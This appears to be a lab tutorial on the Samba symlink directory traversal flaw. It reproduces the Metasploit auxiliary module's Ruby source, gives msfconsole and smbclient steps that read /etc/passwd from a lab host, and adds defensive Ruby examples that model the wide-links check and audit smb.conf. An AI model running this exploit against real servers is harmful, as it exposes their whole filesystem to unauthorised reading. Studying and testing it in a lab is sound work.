Analyze the Samba Vulnerability
In this step, you will learn about the Samba vulnerability and analyze the core code of the exploit module.
Samba is free software that implements the SMB/CIFS (Server Message Block / Common Internet File System) protocol used by Microsoft Windows, so that UNIX-like operating systems can serve and consume Windows file and printer shares. Samba 3 not only shares directories and printers but can also act as an NT4-style domain controller or join an Active Directory domain as a member server (the Active Directory domain controller role itself arrived with Samba 4). In simpler terms, this software bridges the gap between Windows and UNIX-like operating systems and lets the two share resources.
Samba is very widely deployed, so a vulnerability in it has a correspondingly wide impact. Samba exports selected Unix directories (including all of their subdirectories) as network shares, which Windows users can browse over the network just like ordinary Windows folders. The vulnerability analysed here turns that feature against the server: a writeable share becomes a window onto the entire filesystem.
The vulnerability identifier used in this experiment is:
OSVDB-62145
The Metasploit module source analysed in this experiment (loaded in the console as auxiliary/admin/smb/samba_symlink_traversal) is:
symlink_traversal.rb
Let's go through the core code:
## Module class header (not part of the excerpt above but required for the
## module to load): an auxiliary module built on Metasploit's SMB client mixin
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client

  ## Module initialization information, including author information and module introduction
  def initialize
    super(
      'Name'        => 'Samba Symlink Directory Traversal',
      'Description' => %Q{
        This module exploits a directory traversal flaw in the Samba
        CIFS server. To exploit this flaw, a writeable share must be specified.
        The newly created directory will link to the root filesystem.
      },
      'Author'      =>
        [
          'kcope', ## http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html
          'hdm'    ## metasploit module
        ],
      'References'  =>
        [
          ['OSVDB', '62145'],
          ['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
        ],
      'License'     => MSF_LICENSE
    )

    ## Register option information: SMBSHARE must be a share the login can
    ## write to; SMBTARGET is the name of the symlink to create (default: rootfs)
    register_options([
      OptString.new('SMBSHARE',  [true, 'The name of a writeable share on the server']),
      OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])
    ], self.class)
  end

  ## Main execution function
  def run
    ## Open the TCP connection to the SMB port and set up a session with the
    ## SMBUser/SMBPass options (both empty by default, i.e. a null session)
    print_status("Connecting to the server...")
    connect()
    smb_login()

    ## Tree-connect to the writeable share on the target host
    print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")
    self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")

    ## Create a symlink named SMBTARGET inside the share through the SMB Unix
    ## extensions. Its target is ten levels of "../": resolved from the share's
    ## directory this reaches "/" (extra ".." at the root are ignored), so the
    ## link points at the server's root filesystem
    print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")
    self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10)

    ## Tell the operator which UNC path now exposes the root filesystem
    print_status("Now access the following share to browse the root filesystem:")
    print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
    print_line("")
  end
end
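The two interesting lines of the module are the symlink() call and its "../" * 10 target. The following added example (written for this page, not code from the Metasploit module or from Samba) models what happens on the server side: the share records the link, a later request for rootfs/etc/passwd is resolved through it, and the result either escapes the share (wide links = yes, the pre-fix default) or is rejected by a containment check (wide links = no). SymlinkShare, its methods and the share paths are hypothetical; the resolution uses Ruby's File.expand_path, which collapses ".." the way the kernel does. It also shows the limit of the fixed-depth payload: from a share nested more than ten directories deep, ten "../" do not reach "/".

```ruby
# Added example, not Samba or Metasploit code: a model of a writeable share,
# the client-created symlink, and the server's `wide links` containment rule.

class SymlinkShare
  attr_reader :root

  # root: the share's directory on the server (hypothetical path in the examples)
  def initialize(root)
    @root  = File.expand_path(root)
    @links = {}   # symlinks created by clients: name => target string
  end

  # Mirrors self.simple.client.symlink(name, target): the server stores the
  # link as given; the target is interpreted relative to the share root.
  def symlink(name, target)
    @links[name] = target
  end

  # Resolve a share-relative client path to an absolute server path, following
  # a symlink in the first component. File.expand_path collapses "..", and
  # extra ".." components at "/" are ignored, exactly as a real path lookup does.
  def resolve(client_path)
    first, *rest = client_path.split("/").reject(&:empty?)
    base = if @links.key?(first)
             File.expand_path(@links[first], @root)
           else
             File.join(@root, first.to_s)
           end
    File.expand_path(File.join(base, *rest))
  end

  # `wide links = yes`: hand back whatever the path resolves to.
  # `wide links = no`: refuse anything that resolved outside the share root.
  def open(client_path, wide_links:)
    path = resolve(client_path)
    return path if wide_links

    inside = path == @root || path.start_with?(@root + "/")
    raise "access denied: #{client_path} resolves outside the share (#{path})" unless inside

    path
  end
end

# The module's payload: ten levels of "../" from the share directory.
TRAVERSAL = "../" * 10

share = SymlinkShare.new("/srv/samba/tmp")   # hypothetical share path
share.symlink("rootfs", TRAVERSAL)

puts share.open("rootfs/etc/passwd", wide_links: true)    # /etc/passwd
begin
  share.open("rootfs/etc/passwd", wide_links: false)
rescue RuntimeError => e
  puts e.message                                         # access denied ...
end

# Ten "../" is enough for any realistic share path, but not for one nested
# twelve directories deep: the link then lands two levels below "/".
deep = SymlinkShare.new("/a/b/c/d/e/f/g/h/i/j/k/l")
deep.symlink("rootfs", TRAVERSAL)
puts deep.resolve("rootfs")                               # /a/b
```

The containment check is a simplified stand-in for Samba's own path reduction; the real server canonicalises with realpath() and compares against the share's connect path, but the decision it makes is the same.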
With the module's code explained, carry out the actual exploitation in the MSF console by entering the following commands:
search samba
use auxiliary/admin/smb/samba_symlink_traversal
show options
Set the target host (on newer Metasploit versions the option is called RHOSTS; RHOST is accepted as an alias):
set RHOST 192.168.122.102
Select a writeable share on the target (tmp in this lab):
set SMBSHARE tmp
Note: the impact of this vulnerability is not that Samba exports Unix directories as shares (that is its normal function) but that any client with write access to a share can, through the SMB Unix extensions, create a symbolic link pointing outside the share. Because Samba at the time followed such links by default (wide links = yes together with unix extensions = yes), the server's entire filesystem becomes browsable through the share, with the permissions of the Unix account the share runs as (the guest account for an anonymous share). The fix described in the Samba advisory referenced by the module was to make wide links default to no and to disable wide links whenever unix extensions is enabled; on an older server the administrator's mitigation is wide links = no in smb.conf.
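The defensive side of the note above is a configuration question: which shares in smb.conf are writeable and still have wide links in effect? The following added example (written for this page, not Samba or Metasploit code) parses a constructed smb.conf and reports the shares on which this attack works. The legacy: flag models the two behaviours described in the Samba advisory: legacy: true is the pre-fix server (wide links defaults to yes), legacy: false is the fixed server (default no, and wide links forced off whenever unix extensions is on). The parser handles only the plain parameter syntax, not include or config file directives, and the sample configuration is invented for the example.

```ruby
# Added example, not Samba or Metasploit code: audit smb.conf for shares
# exposed to the symlink traversal. A share is exposed when a client can
# create the link (write access and `unix extensions = yes`) and the server
# will follow it out of the share (`follow symlinks = yes` and an effective
# `wide links = yes`).

# Minimal smb.conf parser: { "global" => {...}, "tmp" => {...}, ... } with
# parameter names lowercased and internal whitespace collapsed.
def parse_smb_conf(text)
  sections = Hash.new { |h, k| h[k] = {} }
  current = "global"
  text.each_line do |raw|
    line = raw.sub(/[;#].*$/, "").strip      # drop comments, then blanks
    next if line.empty?

    if line =~ /\A\[(.+)\]\z/
      current = Regexp.last_match(1).strip.downcase
    elsif line.include?("=")
      key, value = line.split("=", 2).map(&:strip)
      sections[current][key.downcase.squeeze(" ")] = value
    end
  end
  sections
end

def truthy?(value)
  %w[yes true 1].include?(value.to_s.strip.downcase)
end

# Per-share parameter with [global] as fallback, then the supplied default.
def effective(conf, share, key, default)
  value = conf[share][key] || conf["global"][key]
  value.nil? ? default : truthy?(value)
end

# Samba spells write access four ways; `read only = yes` is the default.
def writable?(conf, share)
  [conf[share], conf["global"]].each do |sec|
    %w[writable writeable write ok].each { |k| return truthy?(sec[k]) if sec.key?(k) }
    return !truthy?(sec["read only"]) if sec.key?("read only")
  end
  false
end

def symlink_traversal_exposed?(conf, share, legacy:)
  unix_ext = effective(conf, "global", "unix extensions", true)  # global-only parameter
  follow   = effective(conf, share, "follow symlinks", true)
  wide     = effective(conf, share, "wide links", legacy)         # pre-fix default: yes
  wide = false if !legacy && unix_ext   # fixed Samba: incompatible with unix extensions
  writable?(conf, share) && unix_ext && follow && wide
end

def exposed_shares(text, legacy:)
  conf = parse_smb_conf(text)
  conf.keys.reject { |s| %w[global printers].include?(s) }.select { |s| symlink_traversal_exposed?(conf, s, legacy: legacy) }
end

# Constructed sample configuration for the example (not a real target's smb.conf).
SAMPLE_SMB_CONF = <<~CONF
  [global]
     workgroup = WORKGROUP
     unix extensions = yes
     ; wide links deliberately left at its default

  [tmp]
     comment = scratch space
     path = /tmp
     writable = yes
     guest ok = yes

  [docs]
     path = /srv/docs
     read only = yes

  [legacy_share]
     path = /srv/old
     read only = no
     wide links = yes

  [hardened]
     path = /srv/upload
     writeable = yes
     wide links = no
     follow symlinks = no
CONF

puts "exposed on a pre-fix server: #{exposed_shares(SAMPLE_SMB_CONF, legacy: true).inspect}"    # ["tmp", "legacy_share"]
puts "exposed on a fixed server:   #{exposed_shares(SAMPLE_SMB_CONF, legacy: false).inspect}"   # []
```

On the pre-fix server the tmp share used in this lab is flagged because it is writeable and inherits the old wide links default; legacy_share is flagged because it sets wide links = yes explicitly. On a fixed server neither is, since unix extensions = yes forces wide links off; docs is read-only and hardened has both protective settings, so they are never flagged.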
After setting all the required parameters, run the module (run is the usual command for an auxiliary module; exploit is accepted as an alias):
exploit
If successful, you should see the following message:
[*] 192.168.122.102:445 - Now access the following share to browse the root filesystem:
After successful exploitation, leave the Metasploit console with the exit command and test from the terminal whether you can connect to the share with smbclient. You will be prompted for a password; press Enter to submit an empty one, which this share accepts:
exit
smbclient //192.168.122.102/tmp
Once connected, you can verify access to the root filesystem by executing the following command:
more rootfs/etc/passwd
You should see output similar to:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
[....]
This confirms that the exploit succeeded: the rootfs entry created in the share is a symlink to /, so the target host's entire filesystem is now readable through the share with the permissions of the account the share runs as (this is read access through the share, not a shell on the host).
Press Ctrl+D (or type exit) to quit smbclient, then start the inspection.